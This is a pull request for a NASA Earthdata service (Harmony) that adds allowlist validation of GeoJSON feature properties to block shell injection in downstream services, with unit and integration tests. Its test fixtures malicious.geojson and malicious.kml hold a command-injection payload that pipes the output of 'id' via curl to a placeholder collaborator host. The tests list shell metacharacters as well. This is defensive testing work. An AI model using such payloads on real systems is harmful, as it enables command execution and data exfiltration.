### PR TITLE
Harmony 2403 malicious geojson

### DIFF
--- a/services/harmony/app/middleware/shapefile-converter.ts
+++ b/services/harmony/app/middleware/shapefile-converter.ts
@@ -240,13 +240,66 @@ export function normalizeGeoJsonCoords(geojson: any): any {
   return normalizeFeature(cloneDeep(geojson));
 }
 
+// Feature property values may only contain letters (any script), numbers, spaces, and this
+// small set of punctuation. This is an allowlist rather than a denylist of "known-bad" shell
+// metacharacters: backend services (external to this repo) read the uploaded GeoJSON and have
+// been observed interpolating property values into shell command lines, so we cannot rely on
+// knowing every dangerous pattern in advance. Ordinary attribute values (place names, IDs, etc.)
+// are expected to fit this set; anything that doesn't is rejected rather than passed through.
+const SAFE_PROPERTY_VALUE_RE = /^[\p{L}\p{N} .,\-_()/:@%]*$/u;
+
+/**
+ * Throws if `value`, or anything nested inside it, is a string containing a character outside
+ * the allowlist used for feature property values.
+ * @param value - a property value (or a nested array/object member of one)
+ * @param path - human-readable path to `value`, used in the error message
+ * @throws RequestValidationError - if an unsafe character is found
+ */
+function assertSafePropertyValue(value: unknown, path: string): void {
+  if (typeof value === 'string') {
+    if (!SAFE_PROPERTY_VALUE_RE.test(value)) {
+      throw new RequestValidationError(
+        `Shapefile contains an unsupported character in ${path}. Feature property values may `
+        + 'only contain letters, numbers, spaces, and the following punctuation: . , - _ ( ) / : @ %');
+    }
+  } else if (Array.isArray(value)) {
+    value.forEach((v, i) => assertSafePropertyValue(v, `${path}[${i}]`));
+  } else if (value !== null && typeof value === 'object') {
+    for (const [key, v] of Object.entries(value)) {
+      assertSafePropertyValue(v, `${path}.${key}`);
+    }
+  }
+}
+
+/**
+ * Rejects a GeoJSON Feature or FeatureCollection whose feature `properties` (or a string
+ * `id`) contain characters outside the safe allowlist. Property keys are not checked, only
+ * values, since keys come from the source file's own schema/column names, not free-text content.
+ * @param geoJson - the object representing the geojson
+ * @throws RequestValidationError - if an unsafe property value is found
+ */
+function assertSafeFeatureProperties(geoJson: any): void {
+  const features = geoJson?.type === 'FeatureCollection' ? geoJson.features : [geoJson];
+  for (const feature of features ?? []) {
+    if (feature?.properties) assertSafePropertyValue(feature.properties, 'properties');
+    if (typeof feature?.id === 'string') assertSafePropertyValue(feature.id, 'id');
+  }
+}
+
 /**
  * Change longitudes of a geojson file to be in the [-180, 180] range and split at antimeridian
  * if needed. Will also change coordinate order to counter-clockwise if needed.
  * @param geoJson - An object representing the json for a geojson file
+ * @throws RequestValidationError - if the geojson file is not valid
  * @returns An object with the normalized geojson
  */
 export function normalizeGeoJson(geoJson: object): object {
+
+  if (!valid(geoJson)) {
+    throw new RequestValidationError('Shapefile is not or cannot be converted to valid geojson');
+  }
+  assertSafeFeatureProperties(geoJson);
+
   let newGeoJson = normalizeGeoJsonCoords(geoJson);
   newGeoJson = convertPointsToPolygons(newGeoJson);
 
@@ -282,11 +335,7 @@ async function normalizeGeoJsonFile(url: string, isLocal: boolean): Promise<stri
   if (!isLocal) {
     originalGeoJson = await store.getObjectJson(url);
   } else {
-    originalGeoJson = (await fs.readFile(localFile)).toJSON();
-  }
-
-  if (!valid(originalGeoJson)) {
-    throw new RequestValidationError('Shapefile is not or cannot be converted to valid geojson');
+    originalGeoJson = JSON.parse(await fs.readFile(localFile, 'utf8'));
   }
 
   const normalizedGeoJson = normalizeGeoJson(originalGeoJson);
@@ -336,7 +385,11 @@ export default async function shapefileConverter(req, res, next: NextFunction): 
       let convertedFile;
       try {
         convertedFile = await converter.geoJsonConverter(originalFile, req.context.logger);
-        operation.geojson = await store.uploadFile(convertedFile, `${url}.geojson`);
+        const rawGeoJson = JSON.parse(await fs.readFile(convertedFile, 'utf8'));
+        const normalizedGeoJson = normalizeGeoJson(rawGeoJson);
+        const geoJsonUrl = `${url}.geojson`;
+        await store.upload(JSON.stringify(normalizedGeoJson), geoJsonUrl);
+        operation.geojson = geoJsonUrl;
       } finally {
         if (convertedFile) {
           await fs.unlink(convertedFile);

--- a/services/harmony/app/middleware/shapefile-converter.ts
+++ b/services/harmony/app/middleware/shapefile-converter.ts
@@ -240,12 +240,8 @@ export function normalizeGeoJsonCoords(geojson: any): any {
   return normalizeFeature(cloneDeep(geojson));
 }
 
-// Feature property values may only contain letters (any script), numbers, spaces, and this
-// small set of punctuation. This is an allowlist rather than a denylist of "known-bad" shell
-// metacharacters: backend services (external to this repo) read the uploaded GeoJSON and have
-// been observed interpolating property values into shell command lines, so we cannot rely on
-// knowing every dangerous pattern in advance. Ordinary attribute values (place names, IDs, etc.)
-// are expected to fit this set; anything that doesn't is rejected rather than passed through.
+// This list of valid geojson property characters is used to sanitize geojson before sending
+// it to the CMR or backend services
 const SAFE_PROPERTY_VALUE_RE = /^[\p{L}\p{N} .,\-_()/:@%]*$/u;
 
 /**

--- a/services/harmony/app/middleware/shapefile-converter.ts
+++ b/services/harmony/app/middleware/shapefile-converter.ts
@@ -10,6 +10,7 @@ import { DOMParser } from '@xmldom/xmldom';
 import { NextFunction } from 'express';
 import { Feature, MultiPoint, MultiPolygon, Point, Polygon } from 'geojson';
 import splitGeoJson from 'geojson-antimeridian-cut';
+import { valid } from 'geojson-validation';
 import { cloneDeep, get, isEqual } from 'lodash';
 import * as shpjs from 'shpjs';
 import * as tmp from 'tmp-promise';
@@ -271,6 +272,7 @@ export function normalizeGeoJson(geoJson: object): object {
  * Handle any weird cases like splitting geometry that crosses the antimeridian
  * @param url - the url of the geojson file
  * @param isLocal - whether the url is a downloaded file (true) or needs to be downloaded (false)
+ * @throws RequestValidationError - if the geojson file is not valid
  * @returns the link to the geojson file
  */
 async function normalizeGeoJsonFile(url: string, isLocal: boolean): Promise<string> {
@@ -282,6 +284,11 @@ async function normalizeGeoJsonFile(url: string, isLocal: boolean): Promise<stri
   } else {
     originalGeoJson = (await fs.readFile(localFile)).toJSON();
   }
+
+  if (!valid(originalGeoJson)) {
+    throw new RequestValidationError('Shapefile is not or cannot be converted to valid geojson');
+  }
+
   const normalizedGeoJson = normalizeGeoJson(originalGeoJson);
 
   let resultUrl = url;

--- a/services/harmony/fixtures/cmr.uat.earthdata.nasa.gov-443/178770274772918538
+++ b/services/harmony/fixtures/cmr.uat.earthdata.nasa.gov-443/178770274772918538
@@ -1,0 +1,31 @@
+POST /search/granules.json
+accept: application/json
+content-type: multipart/form-data; boundary=----------------------------012345678901234567890123
+accept-encoding: gzip,deflate
+body: ------------------------------012345678901234567890123\r\nContent-Disposition: form-data; name=\"page_size\"\r\n\r\n100\r\n------------------------------012345678901234567890123\r\nContent-Disposition: form-data; name=\"temporal\"\r\n\r\n2020-01-02T00:00:00.000Z,2020-01-02T01:00:00.000Z\r\n------------------------------012345678901234567890123\r\nContent-Disposition: form-data; name=\"bounding_box\"\r\n\r\n17,-90,98,90\r\n------------------------------012345678901234567890123\r\nContent-Disposition: form-data; name=\"collection_concept_id\"\r\n\r\nC1233800302-EEDTEST\r\n------------------------------012345678901234567890123--\r\n
+
+HTTP/1.1 200 OK
+content-type: application/json;charset=utf-8
+connection: keep-alive
+date: Wed, 26 Aug 2026 00:05:47 GMT
+server: ServerTokens ProductOnly
+vary: Accept-Encoding
+x-frame-options: SAMEORIGIN
+access-control-allow-origin: *
+x-xss-protection: 1; mode=block
+cmr-request-id: f5ba8235-8e1f-4092-80b7-bd8a21b56079
+content-sha1: ee849158b92d124d5bf5c658b65af39e341771a0
+strict-transport-security: max-age=31536000; includeSubDomains; preload
+cmr-search-after: ["eedtest",1577923200000,1233800352]
+cmr-hits: 1
+access-control-expose-headers: CMR-Hits, CMR-Request-Id, X-Request-Id, CMR-Scroll-Id, CMR-Search-After, CMR-Timed-Out, CMR-Shapefile-Original-Point-Count, CMR-Shapefile-Simplified-Point-Count
+x-content-type-options: nosniff
+cmr-took: 55
+x-request-id: f5ba8235-8e1f-4092-80b7-bd8a21b56079
+content-md5: bcf4c97d6b54adf6ee46cbc4a30863ae
+x-cache: Miss from cloudfront
+via: 1.1 64088478b3d28ad7e2abca8879c9e59e.cloudfront.net (CloudFront)
+x-amz-cf-pop: IAD61-P11
+x-amz-cf-id: eJKs8vVWZ296TARHGduS4TecnkD1n1hTm5ExuHqv4kQ7slxOEGZ9-w==
+
+{"feed":{"updated":"2026-08-26T00:05:47.745Z","id":"https://cmr.uat.earthdata.nasa.gov:443/search/granules.json","title":"ECHO granule metadata","entry":[{"producer_granule_id":"002_00_3200ff_global","boxes":["-90 -180 90 180"],"time_start":"2020-01-02T00:00:00.000Z","updated":"2020-02-25T21:43:11.000Z","dataset_id":"Harmony Example Data","data_center":"EEDTEST","title":"002_00_3200ff_global","coordinate_system":"CARTESIAN","day_night_flag":"BOTH","time_end":"2020-01-02T01:59:59.000Z","id":"G1233800352-EEDTEST","original_format":"UMM_JSON","granule_size":"1.3663883209228516","browse_flag":false,"collection_concept_id":"C1233800302-EEDTEST","online_access_flag":true,"links":[{"rel":"http://esipfed.org/ns/fedsearch/1.1/data#","type":"application/x-netcdf","hreflang":"en-US","href":"https://harmony.uat.earthdata.nasa.gov/service-results/harmony-uat-eedtest-data/C1233800302-EEDTEST/nc/002_00_3200ff_global.nc"},{"rel":"http://esipfed.org/ns/fedsearch/1.1/data#","type":"image/tiff","hreflang":"en-US","href":"https://harmony.uat.earthdata.nasa.gov/service-results/harmony-uat-eedtest-data/C1233800302-EEDTEST/tiff/002_00_3200ff_global.tif"}]}]}}

--- a/services/harmony/fixtures/cmr.uat.earthdata.nasa.gov-443/178770274798674292
+++ b/services/harmony/fixtures/cmr.uat.earthdata.nasa.gov-443/178770274798674292
@@ -1,0 +1,31 @@
+POST /search/granules.json
+accept: application/json
+content-type: multipart/form-data; boundary=----------------------------012345678901234567890123
+accept-encoding: gzip,deflate
+body: ------------------------------012345678901234567890123\r\nContent-Disposition: form-data; name=\"page_size\"\r\n\r\n100\r\n------------------------------012345678901234567890123\r\nContent-Disposition: form-data; name=\"temporal\"\r\n\r\n2020-01-02T00:00:00.000Z,2020-01-02T01:00:00.000Z\r\n------------------------------012345678901234567890123\r\nContent-Disposition: form-data; name=\"bounding_box\"\r\n\r\n17,-90,98,90\r\n------------------------------012345678901234567890123\r\nContent-Disposition: form-data; name=\"collection_concept_id\"\r\n\r\nC1233800302-EEDTEST\r\n------------------------------012345678901234567890123--\r\n
+
+HTTP/1.1 200 OK
+content-type: application/json;charset=utf-8
+connection: keep-alive
+date: Wed, 26 Aug 2026 00:05:47 GMT
+server: ServerTokens ProductOnly
+vary: Accept-Encoding
+x-frame-options: SAMEORIGIN
+access-control-allow-origin: *
+x-xss-protection: 1; mode=block
+cmr-request-id: 9bf79d3a-d5c0-4032-9313-e5377bfefd90
+content-sha1: b4bc0f607102ea262de73e886b8323b7209969e3
+strict-transport-security: max-age=31536000; includeSubDomains; preload
+cmr-search-after: ["eedtest",1577923200000,1233800352]
+cmr-hits: 1
+access-control-expose-headers: CMR-Hits, CMR-Request-Id, X-Request-Id, CMR-Scroll-Id, CMR-Search-After, CMR-Timed-Out, CMR-Shapefile-Original-Point-Count, CMR-Shapefile-Simplified-Point-Count
+x-content-type-options: nosniff
+cmr-took: 40
+x-request-id: 9bf79d3a-d5c0-4032-9313-e5377bfefd90
+content-md5: f351840d79b24267cda867f5f6e9ba13
+x-cache: Miss from cloudfront
+via: 1.1 64088478b3d28ad7e2abca8879c9e59e.cloudfront.net (CloudFront)
+x-amz-cf-pop: IAD61-P11
+x-amz-cf-id: HCi3S2zJnmT2qJOv87Wns9RsDc1bcF0v3W22roj5uGygGLJ-OGugTw==
+
+{"feed":{"updated":"2026-08-26T00:05:47.931Z","id":"https://cmr.uat.earthdata.nasa.gov:443/search/granules.json","title":"ECHO granule metadata","entry":[{"producer_granule_id":"002_00_3200ff_global","boxes":["-90 -180 90 180"],"time_start":"2020-01-02T00:00:00.000Z","updated":"2020-02-25T21:43:11.000Z","dataset_id":"Harmony Example Data","data_center":"EEDTEST","title":"002_00_3200ff_global","coordinate_system":"CARTESIAN","day_night_flag":"BOTH","time_end":"2020-01-02T01:59:59.000Z","id":"G1233800352-EEDTEST","original_format":"UMM_JSON","granule_size":"1.3663883209228516","browse_flag":false,"collection_concept_id":"C1233800302-EEDTEST","online_access_flag":true,"links":[{"rel":"http://esipfed.org/ns/fedsearch/1.1/data#","type":"application/x-netcdf","hreflang":"en-US","href":"https://harmony.uat.earthdata.nasa.gov/service-results/harmony-uat-eedtest-data/C1233800302-EEDTEST/nc/002_00_3200ff_global.nc"},{"rel":"http://esipfed.org/ns/fedsearch/1.1/data#","type":"image/tiff","hreflang":"en-US","href":"https://harmony.uat.earthdata.nasa.gov/service-results/harmony-uat-eedtest-data/C1233800302-EEDTEST/tiff/002_00_3200ff_global.tif"}]}]}}

--- a/services/harmony/fixtures/cmr.uat.earthdata.nasa.gov-443/178770285701597863
+++ b/services/harmony/fixtures/cmr.uat.earthdata.nasa.gov-443/178770285701597863
@@ -1,0 +1,31 @@
+POST /search/granules.json
+accept: application/json
+content-type: multipart/form-data; boundary=----------------------------012345678901234567890123
+accept-encoding: gzip,deflate
+body: ------------------------------012345678901234567890123\r\nContent-Disposition: form-data; name=\"page_size\"\r\n\r\n100\r\n------------------------------012345678901234567890123\r\nContent-Disposition: form-data; name=\"temporal\"\r\n\r\n2020-01-02T00:00:00.000Z,2020-01-02T01:00:00.000Z\r\n------------------------------012345678901234567890123\r\nContent-Disposition: form-data; name=\"bounding_box\"\r\n\r\n17,-90,98,90\r\n------------------------------012345678901234567890123\r\nContent-Disposition: form-data; name=\"collection_concept_id\"\r\n\r\nC1233800302-EEDTEST\r\n------------------------------012345678901234567890123\r\nContent-Disposition: form-data; name=\"shapefile\"; filename=\"shapefile\"\r\nContent-Type: application/geo+json\r\n\r\n{\"type\":\"FeatureCollection\",\"features\":[{\"type\":\"Feature\",\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[[[-14.0948,31.3277],[-21.8726,8.9666],[20.3218,-40.6167],[30.6274,-40.6167],[58.4329,13.4388],[35.0996,35.7999],[5.5441,39.4943],[-14.0948,31.3277]],[[-10.5948,13.8277],[2.433,32.2999],[29.8496,30.7443],[51.4329,13.4388],[29.8496,-34.9778],[21.0996,-37.5056],[-16.2337,7.411],[-10.5948,13.8277]]],\"bbox\":[-21.8726,-40.6167,58.4329,39.4943]},\"properties\":{\"id\":null}},{\"type\":\"Feature\",\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[[[-57.8447,37.7443],[-33.5392,12.661],[11.7663,48.2443],[-18.1781,71.9665],[-57.8447,37.7443]]],\"bbox\":[-57.844699999999996,12.661,11.7663,71.9665]},\"properties\":{\"id\":null}}],\"fileName\":\"africa_demo\"}\r\n------------------------------012345678901234567890123--\r\n
+
+HTTP/1.1 200 OK
+content-type: application/json;charset=utf-8
+connection: keep-alive
+date: Wed, 26 Aug 2026 00:07:36 GMT
+server: ServerTokens ProductOnly
+vary: Accept-Encoding
+x-frame-options: SAMEORIGIN
+access-control-allow-origin: *
+x-xss-protection: 1; mode=block
+cmr-request-id: 507c36ca-1214-4094-b151-581aef85c4c1
+content-sha1: 0c1b608b17a5442b7bd60dd22e504a05968b818a
+strict-transport-security: max-age=31536000; includeSubDomains; preload
+cmr-search-after: ["eedtest",1577923200000,1233800352]
+cmr-hits: 1
+access-control-expose-headers: CMR-Hits, CMR-Request-Id, X-Request-Id, CMR-Scroll-Id, CMR-Search-After, CMR-Timed-Out, CMR-Shapefile-Original-Point-Count, CMR-Shapefile-Simplified-Point-Count
+x-content-type-options: nosniff
+cmr-took: 68
+x-request-id: 507c36ca-1214-4094-b151-581aef85c4c1
+content-md5: 840cbd8d6e1c375d3d7fae3b386f0c1b
+x-cache: Miss from cloudfront
+via: 1.1 1eddbb58412e7e0b212d76c626734826.cloudfront.net (CloudFront)
+x-amz-cf-pop: SFO53-P9
+x-amz-cf-id: mF_pX7I20I7YP6pz3omewBz9ydmxWGYahPTRrd9vIeg06IcOk8bunQ==
+
+{"feed":{"updated":"2026-08-26T00:07:36.993Z","id":"https://cmr.uat.earthdata.nasa.gov:443/search/granules.json","title":"ECHO granule metadata","entry":[{"producer_granule_id":"002_00_3200ff_global","boxes":["-90 -180 90 180"],"time_start":"2020-01-02T00:00:00.000Z","updated":"2020-02-25T21:43:11.000Z","dataset_id":"Harmony Example Data","data_center":"EEDTEST","title":"002_00_3200ff_global","coordinate_system":"CARTESIAN","day_night_flag":"BOTH","time_end":"2020-01-02T01:59:59.000Z","id":"G1233800352-EEDTEST","original_format":"UMM_JSON","granule_size":"1.3663883209228516","browse_flag":false,"collection_concept_id":"C1233800302-EEDTEST","online_access_flag":true,"links":[{"rel":"http://esipfed.org/ns/fedsearch/1.1/data#","type":"application/x-netcdf","hreflang":"en-US","href":"https://harmony.uat.earthdata.nasa.gov/service-results/harmony-uat-eedtest-data/C1233800302-EEDTEST/nc/002_00_3200ff_global.nc"},{"rel":"http://esipfed.org/ns/fedsearch/1.1/data#","type":"image/tiff","hreflang":"en-US","href":"https://harmony.uat.earthdata.nasa.gov/service-results/harmony-uat-eedtest-data/C1233800302-EEDTEST/tiff/002_00_3200ff_global.tif"}]}]}}

--- a/services/harmony/package-lock.json
+++ b/services/harmony/package-lock.json
@@ -57,6 +57,7 @@
         "form-data": "^4.0.6",
         "geo-split": "^0.1.2",
         "geojson-antimeridian-cut": "^0.1.0",
+        "geojson-validation": "1.0.2",
         "highlight.js": "^11.7.0",
         "js-yaml": "^4.3.0",
         "json2csv": "^5.0.7",
@@ -9909,6 +9910,15 @@
     "node_modules/geojson-rbush/node_modules/@types/geojson": {
       "version": "7946.0.8",
       "license": "MIT"
+    },
+    "node_modules/geojson-validation": {
+      "version": "1.0.2",
+      "resolved": "https://registry.npmjs.org/geojson-validation/-/geojson-validation-1.0.2.tgz",
+      "integrity": "sha512-K5jrJ4wFvORn2pRKeg181LL0QPYuEKn2KHPvfH1m2QtFlAXFLKdseqt0XwBM3ELOY7kNM1fglRQ6ZwUQZ5S00A==",
+      "license": "LGPL-3",
+      "bin": {
+        "gjv": "bin/gjv"
+      }
     },
     "node_modules/get-caller-file": {
       "version": "2.0.5",

--- a/services/harmony/package.json
+++ b/services/harmony/package.json
@@ -119,6 +119,7 @@
     "form-data": "^4.0.6",
     "geo-split": "^0.1.2",
     "geojson-antimeridian-cut": "^0.1.0",
+    "geojson-validation": "1.0.2",
     "highlight.js": "^11.7.0",
     "js-yaml": "^4.3.0",
     "json2csv": "^5.0.7",

--- a/services/harmony/test/geojson-normalizer.ts
+++ b/services/harmony/test/geojson-normalizer.ts
@@ -603,6 +603,7 @@ describe('normalizeGeoJson feature property safety validation', function () {
    * @returns a FeatureCollection geojson object
    */
   function makeGeoJson(properties: object, id?: string): object {
+    // eslint-disable-next-line @typescript-eslint/no-explicit-any
     const feature: any = { type: 'Feature', geometry, properties };
     if (id !== undefined) feature.id = id;
     return { type: 'FeatureCollection', features: [feature] };

--- a/services/harmony/test/geojson-normalizer.ts
+++ b/services/harmony/test/geojson-normalizer.ts
@@ -6,6 +6,7 @@ import { expect } from 'chai';
 import {
   convertPointsToPolygons, normalizeGeoJson, normalizeGeoJsonCoords, numberOfSidesForPointCircle,
 } from '../app/middleware/shapefile-converter';
+import { RequestValidationError } from '../app/util/errors';
 
 // Simple geojson that should not change when normalized
 const simpleGeoJson = {
@@ -584,4 +585,79 @@ describe('normalizeGeoJson', function () {
     normalizedGeoJson = normalizeGeoJson(normalizedGeoJson);
     expect(normalizedGeoJson).to.eql(expectedNormalization);
   });
+});
+
+describe('normalizeGeoJson feature property safety validation', function () {
+  // A minimal, valid polygon used to isolate the property-safety checks from coordinate
+  // normalization behavior, which is covered above.
+  const geometry = {
+    type: 'Polygon',
+    coordinates: [[[-50, 60], [-50, 61], [-49, 61], [-49, 60], [-50, 60]]],
+  };
+
+  /**
+   * Build a single-feature FeatureCollection with the given properties (and optional id) for
+   * exercising the property-safety validator via normalizeGeoJson.
+   * @param properties - the properties object to attach to the feature
+   * @param id - an optional feature id
+   * @returns a FeatureCollection geojson object
+   */
+  function makeGeoJson(properties: object, id?: string): object {
+    const feature: any = { type: 'Feature', geometry, properties };
+    if (id !== undefined) feature.id = id;
+    return { type: 'FeatureCollection', features: [feature] };
+  }
+
+  it('allows a plain ASCII property value', function () {
+    expect(() => normalizeGeoJson(makeGeoJson({ name: 'Watershed Region A-12' }))).to.not.throw();
+  });
+
+  it('allows Unicode letters in a property value', function () {
+    expect(() => normalizeGeoJson(makeGeoJson({ name: 'São Paulo Reserve (北京)' }))).to.not.throw();
+  });
+
+  it('allows numeric, boolean, and null property values', function () {
+    expect(() => normalizeGeoJson(makeGeoJson({ count: 5, active: true, note: null }))).to.not.throw();
+  });
+
+  it('does not check property keys, only values', function () {
+    expect(() => normalizeGeoJson(makeGeoJson({ 'weird; key <name>': 'safe value' }))).to.not.throw();
+  });
+
+  it('checks values nested inside arrays in properties', function () {
+    expect(() => normalizeGeoJson(makeGeoJson({ tags: ['ok', 'bad; value'] })))
+      .to.throw(RequestValidationError, /properties\.tags\[1\]/);
+  });
+
+  it('checks values nested inside objects in properties', function () {
+    expect(() => normalizeGeoJson(makeGeoJson({ meta: { note: 'bad`value' } })))
+      .to.throw(RequestValidationError, /properties\.meta\.note/);
+  });
+
+  it('checks a string feature id', function () {
+    expect(() => normalizeGeoJson(makeGeoJson({}, 'bad\'id'))).to.throw(RequestValidationError, /^Shapefile contains an unsupported character in id\./);
+  });
+
+  const disallowedValues = [
+    ['single quote', 'x\''],
+    ['double quote', 'x"'],
+    ['backtick', 'x`'],
+    ['semicolon', 'x;'],
+    ['pipe', 'x|'],
+    ['ampersand', 'x&'],
+    ['dollar sign', 'x$'],
+    ['backslash', 'x\\'],
+    ['angle brackets', 'x<y>'],
+    ['curly braces', 'x{y}'],
+    ['square brackets', 'x[y]'],
+    ['raw newline', 'x\ny'],
+    ['raw tab', 'x\ty'],
+  ];
+
+  for (const [description, value] of disallowedValues) {
+    it(`rejects a property value containing a ${description}`, function () {
+      expect(() => normalizeGeoJson(makeGeoJson({ name: value })))
+        .to.throw(RequestValidationError, /^Shapefile contains an unsupported character in properties\.name\./);
+    });
+  }
 });

--- a/services/harmony/test/ogc-api-coverages/get-coverage-rangeset-shapefile.ts
+++ b/services/harmony/test/ogc-api-coverages/get-coverage-rangeset-shapefile.ts
@@ -262,6 +262,36 @@ describe('OGC API Coverages - getCoverageRangeset with shapefile', function () {
       });
     });
 
+    describe('and a malicious GeoJSON shapefile', function () {
+      const shapeForm = { ...form, shapefile: { path: './test/resources/malicious.geojson', mimetype: 'application/geo+json' } };
+      hookPostRangesetRequest(version, collection, variableName, shapeForm);
+
+      it('returns a shapefile conversion error', function () {
+        expect(this.res.status).to.equal(400);
+        expect(JSON.parse(this.res.text)).to.eql({
+          code: 'harmony.RequestValidationError',
+          description: 'Error: Shapefile contains an unsupported character in properties.name. '
+            + 'Feature property values may only contain letters, numbers, spaces, and the following '
+            + 'punctuation: . , - _ ( ) / : @ %',
+        });
+      });
+    });
+
+    describe('and a malicious KML shapefile', function () {
+      const shapeForm = { ...form, shapefile: { path: './test/resources/malicious.kml', mimetype: 'application/vnd.google-earth.kml+xml' } };
+      hookPostRangesetRequest(version, collection, variableName, shapeForm);
+
+      it('returns a shapefile conversion error', function () {
+        expect(this.res.status).to.equal(400);
+        expect(JSON.parse(this.res.text)).to.eql({
+          code: 'harmony.RequestValidationError',
+          description: 'Error: Shapefile contains an unsupported character in properties.name. '
+            + 'Feature property values may only contain letters, numbers, spaces, and the following '
+            + 'punctuation: . , - _ ( ) / : @ %',
+        });
+      });
+    });
+
     describe('and an unrecognized shapefile type', function () {
       const shapeForm = { ...form, shapefile: { path: './test/resources/corrupt_file.kml', mimetype: 'text/plain' } };
       hookPostRangesetRequest(version, collection, variableName, shapeForm);

--- a/services/harmony/test/resources/malicious.geojson
+++ b/services/harmony/test/resources/malicious.geojson
@@ -1,3 +1,2 @@
-{"type":"FeatureCollection","features":[{"type":"Feature","properties":{"name":"x'; id | curl --data-binary @-
-http://COLLABORATOR/id ; echo '"},"geometry":{"type":"Polygon","coordinates":[[[-50,60],[-50,61],[-49,61],[-49
+{"type":"FeatureCollection","features":[{"type":"Feature","properties":{"name":"x'; id | curl --data-binary @-http://COLLABORATOR/id ; echo '"},"geometry":{"type":"Polygon","coordinates":[[[-50,60],[-50,61],[-49,61],[-49
 ,60],[-50,60]]]}}]}

--- a/services/harmony/test/resources/malicious.geojson
+++ b/services/harmony/test/resources/malicious.geojson
@@ -1,0 +1,3 @@
+{"type":"FeatureCollection","features":[{"type":"Feature","properties":{"name":"x'; id | curl --data-binary @-
+http://COLLABORATOR/id ; echo '"},"geometry":{"type":"Polygon","coordinates":[[[-50,60],[-50,61],[-49,61],[-49
+,60],[-50,60]]]}}]}

--- a/services/harmony/test/resources/malicious.kml
+++ b/services/harmony/test/resources/malicious.kml
@@ -1,0 +1,21 @@
+<?xml version="1.0" encoding="utf-8" ?>
+<kml>
+  <Document>
+    <Placemark>
+      <name>x'; id | curl --data-binary @-http://COLLABORATOR/id ; echo '</name>
+      <Polygon>
+        <outerBoundaryIs>
+          <LinearRing>
+            <coordinates>
+              -50,60
+              -50,61
+              -49,61
+              -49,60
+              -50,60
+            </coordinates>
+          </LinearRing>
+        </outerBoundaryIs>
+      </Polygon>
+    </Placemark>
+  </Document>
+</kml>


### PR DESCRIPTION
## Jira Issue ID
HARMONY-2403

## Description
Add validation of GeoJSON (original or converted) to prevent malicious files being used to execute code in downstream services.

## Local Test Steps
```
 curl -Ln -bj "http://localhost:3000/C1240150677-EEDTEST/ogc-api-coverages/1.0.0/collections/all/coverage/rangeset?granuleId=G1245558666-EEDTEST" -F "shapefile=@services/harmony/test/resources/malicious.geojson;type=application/geo+json"
```

Should return the following error:
```
{"code":"harmony.RequestValidationError","description":"Error: Shapefile contains an unsupported character in properties.name. Feature property values may only contain letters, numbers, spaces, and the following punctuation: . , - _ ( ) / : @ %"}
```

## PR Acceptance Checklist
* [x] Acceptance criteria met
* [x] Tests added/updated (if needed) and passing
* [ ] Documentation updated (if needed)
* [x] Harmony in a Box tested (if changes made to microservices or new dependencies added)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **Bug Fixes**
  * Added validation for GeoJSON properties and feature IDs to reject unsafe characters and malicious input.
  * Improved GeoJSON and shapefile processing to consistently parse, normalize, and upload valid GeoJSON.
  * Invalid GeoJSON and KML requests now return clear HTTP 400 validation errors.

* **Tests**
  * Added coverage for nested properties, IDs, accepted values, and malicious GeoJSON/KML inputs.
  * Expanded coverage for granule searches using spatial and temporal filters.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->